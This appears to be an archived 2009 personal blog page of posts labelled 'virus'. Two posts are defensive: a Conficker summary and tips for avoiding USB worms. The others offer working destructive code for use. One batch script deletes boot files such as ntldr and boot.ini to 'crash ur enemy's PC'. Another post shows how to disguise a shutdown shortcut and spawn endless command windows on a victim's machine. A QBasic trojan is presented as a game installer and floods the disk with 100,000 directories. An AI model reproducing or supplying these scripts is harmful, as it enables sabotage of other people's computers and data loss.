Showing posts with label VIRUS. Show all posts
Showing posts with label VIRUS. Show all posts

Rise of the Conficker worm.(windows)

Posted by Shashank Krishna Wednesday, February 11, 2009


Jan 20th, 2009. The Conficker worm seems to have run amuck, the latest being the case of 8000 PCs of a Sheffield hospital having been infected.

The Conficker (Kido, Downandup or Downadup) is a malicious polymorphic worm that spreads through low security networks, memory sticks, and PCs without the latest security updates. Over 9 Million PCs have so far been infected, making it one of the most widespread infections in recent times. It has the potential of creating the world's biggest Botnet. It can be used by hackers and spammers to steal users’ login details and credit card information, and even to re-route web traffic to disguise criminal activity, say security experts.

Conficker disables a number of system services such as Windows Automatic Update, Windows Security Center, Windows Defender and Windows Error Reporting. It then connects to a server, where it receives further orders to propagate, gather personal information, and downloads and installs additional malware onto the victim's computer. The worm also attaches itself to certain critical Windows processes such as svchost.exe, explorer.exe and services.exe.

Microsoft had discovered this vulnerability which the Conficker worm exploits before the worm actually surfaced & addressed it at the end of October 2008 with Microsoft Security Bulletin MS08-067. Users who applied that security update would have been protected against the worm.
Confiker Virus

Conficker basically carries out a social engineering trick. When you insert a USB stick you get a dialog box asking what is to be done. One of the options in the dialog box is "Open folder to view files". This could actually be an "autorun.inf" option created by Conficker. Autorun isn't disabled by default. So perhaps you want to disable it for some time.

This Social engineering autoplay trick helps infect Vista as well as Windows 7 too. Windows 7 is still in development, so there might still be time to modify how AutoPlay works in order to limit the scope for social engineering attacks.

To protect against the Conficker worm family, Microsoft recommends that users ensure their anti virus protection is up to date with the latest definition and install Microsoft's MS08-067 patch and all latest security WindowsUpdates. The latest Malicious Software Removal Tool also now has this capability.


Before you leave, please promote this article with your favorite bookmarking site using the Share/save button! AND DO please give your valuable comment
Share/Save/Bookmark
Subscribe
Reblog this post [with Zemanta]

Virus code for windows..Crash ur enemy's PC

Posted by Shashank Krishna Friday, January 30, 2009

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

save as bat file in notepad!!
This will pop up a message saying OWNED!!
and shut down the computer never to reboot again!



type this in notepad

start virus.bat
virus.bat


and save as with this name

virus.bat


ur antivirus will not detect this virus

Basically this program will delete all that files which are needed for booting
If your os is installed in d drive instead of c then replace c with d
Before you leave, please promote this article with your favorite bookmarking site using the Share/save button! AND DO please give your valuable comment
Share/Save/Bookmark
Subscribe

Reblog this post [with Zemanta]

How to make virus in Windows

Posted by Shashank Krishna Tuesday, January 27, 2009

We Take no responsibility for any of this tricks , Do it at your own risk ;) . HaveFun

There are several kinds of fake virus messages you can make. I will discuss 4 of them:

1. Fake computer virus error message

This one is by far, the easiest and all you have to do is to make a new text document with notepad, type msg * YOUR MESSAGE and save as anything.bat. As always, make sure that you select All files instead of Text Document.

2. Forced shutdown trojan.
This will display a custom error message and start a countdown which will shut down the computer.

Right-click your desktop and create a new shortcut.
Paste the following code into the Location box in the Create Shortcut
 menu:
shutdown -s -t 30 -c “Your message here”
Replace 30 with the length of the countdown you want (in seconds) and place your custom error message between the quotes. Click next and name the shortcut to something the victim would be likely to click on such as “Internet explorer” or “My Documents”, etc.

Next you’d want to change the icon. Right-click on the shortcut you made and click properties. Find the Change Icon button and click it. Choose a suitable icon for the name you chose earlier.


And that’s all! Now you just have to sneak the shortcut onto the victim’s desktop and run!

Note: to stop it, open Run from the start menu and type shutdown-a.


3. Endless Command prompt windows trojan
This will open up a series of command prompt windows that will never end.
The basic idea is that there are two .bat files that open the
 other one when opened, so the other one opens the first one again and the windows just won’t stop coming.

How to do this:
1. Fire up notepad and type: 
start 2.bat
2. Save it as 1.bat (make sure you choose all files when saving it)
3. Make another new text document and type: 
start 1.bat
4. Save it as 2.bat into the same folder as the other one.

All you have to do to start it is to click on either of them.

The on
ly way to stop it is to wait for the windows to become so numerous that they are a group on the taskbar. Then you can use Close group to get rid of the bastards.

4. Fake Command prompt trojan viruses
This is also a good way to make the victim believe that a worm is gnawing at their hard drive and that they can’t do anything to stop it.

Open up notepad and type @echo off

  • To make text appear, type it after an echo tag.
  • To have the the commands wait for the user to press any key type pause

(Note: if you write pause >nul it won’t display Press Any key to continue…)

  • To have a complete high-speed description of files in the drive of the .bat file, type dir /s
  • You can also initiate any other command we covered earlier, such as shutdown, error message, etc.

And why no include all of these in one fake virus?

For example:

I can’t post the batch files here, as sharing .bat files over the internet is illegal.
Make sure you don’t do anything stupid with these tips.


Before you leave, please promote this article with your favorite bookmarking site using the Share/save button! AND DO please give your valuable comment
Share/Save/Bookmark
Subscribe

Avoid USB Virus / Worms

Posted by Shashank Krishna Thursday, January 15, 2009

USB Devices like i-pod,pen drives e.t.c; brings viruses/worms which are bad since it disables a lot of features as well as it ruins memory the slows down the whole thing. It disables much of the removal process like Windows RegEdit.exe, MsConfig.exe and also TaskMan.exe. Variations of these also disables your keyboard during normal booting, floods your disk with virus files in the root directory and also the windows directory and some also floods your directory with Folder looking icons that is an executable..

So here are some tips in avoiding this:
1. Always make all files visible like system and also hidden files with their extension shown.Go to Windows Explorer > Tools > Folder Option > View
* Enable Show Hidden File
* Disable Hide Extensions for know file type
* Disable Hide Protected OS files

2. Never Use the Autorun functionality in Windowswhenever you put a disk(flash, memory card, usb drive devices and other form of removable drive) it is always a practice to scan it first. but to avoid being the first to be infected by a wild one, always use Windows Explorer to browse the files.

Use the left side(Folder Window), to browse the files.
Whenever you see an autorun.inf file, delete it! remove the disk and insert it again to avoid clicking it.
To disable autorun go to gpedit.msc >> computer config >> admin templates >> system >> turn off autoplay

3. Always update Virus database!
Share/Save/Bookmark
Subscribe

Write your own Trojan virues..

Posted by Shashank Krishna

This is a little trojan written in Qbasic 4.5 It's a bitch!
REM bitch by Spear
color 14,0
print"installing datafiles... Please wait..."
print"This may take up to 20 minutes, depending on your computer..."
shell "cd\"
for a = 1 to 100000
a$=str$(a)
c$="md" + a$ + ".hee"
shell c$
next a
cls
print"Cybermattixx Version 1.0 is now installed on your system..."
print"Have a shitty day!"
print " ?AM?"
print
input "Hit ENTER To REBOOT your System now!";a$
shell "boot.com"

How to use it?
This can pose as the installation program for a game. This means thatwhen you upload it to a BBS or something, and post that it is akickass game, people will download it and try to install it on theircomputers!

What does it do?
This program changes directory to the root and makes 100000 dirs inthe root. You cannot use deltree to wipe them out in one chunk andyou CANNOT get rid of them without doing reverse engineering on theprogram, ie. rd instead of md. To get rid of them any other way youwould have to format c: or d:
Share/Save/Bookmark
Subscribe

Are You Planning on Quitting Facebook? Why?

@Flickr

www.flickr.com

About Me

My Photo
Shashank Krishna
Bangalore, up, India
nothin much to say.........doin B.tech in IIIT allahabad loves bloggingn hacking.... :) and loooves blogging
View my complete profile

ads2

topads